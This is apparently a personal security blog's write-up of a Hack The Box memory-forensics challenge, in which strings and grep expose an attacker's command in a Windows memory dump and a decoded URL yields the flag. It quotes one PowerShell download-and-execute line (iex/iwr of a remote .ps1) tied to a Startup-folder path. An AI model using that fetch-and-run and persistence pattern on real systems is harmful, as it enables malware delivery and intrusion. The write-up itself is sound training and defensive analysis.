Security Blog, Rants, Raves, Write-ups, and Code
Export
Download and unzip the file and check the hint:
Hint: We spotted a suspicious connection to one of our servers, and immediately took a memory dump. Can you figure out what the attackers were up to?
Files: WIN-LQS146OE2S1-20201027-142607.raw
If the attacker took a memory dump, they must have exfiltrated it and or used an Invoke-WebRequest or wget to grab an external file so that they could run a memory dump. Since those are both web based, let's run:
strings WIN-LQS146OE2S1-20201027-142607.raw | grep http
We see towards the end of the grep response, that indeed an http request with an outfile path was run.
iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") Menu\Programs\Startup\3usy12fv.ps1
If we run the first part of that (http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1) through URL decoder, we get a bity.ly URL:
http://bit.ly/SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=.ps1
If we run the filename, without the extension, through a Base64 Decoder, we get the Flag and another challenge is complete!!
HTB{W1Nd0ws_f0r3Ns1CS_3H?}
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.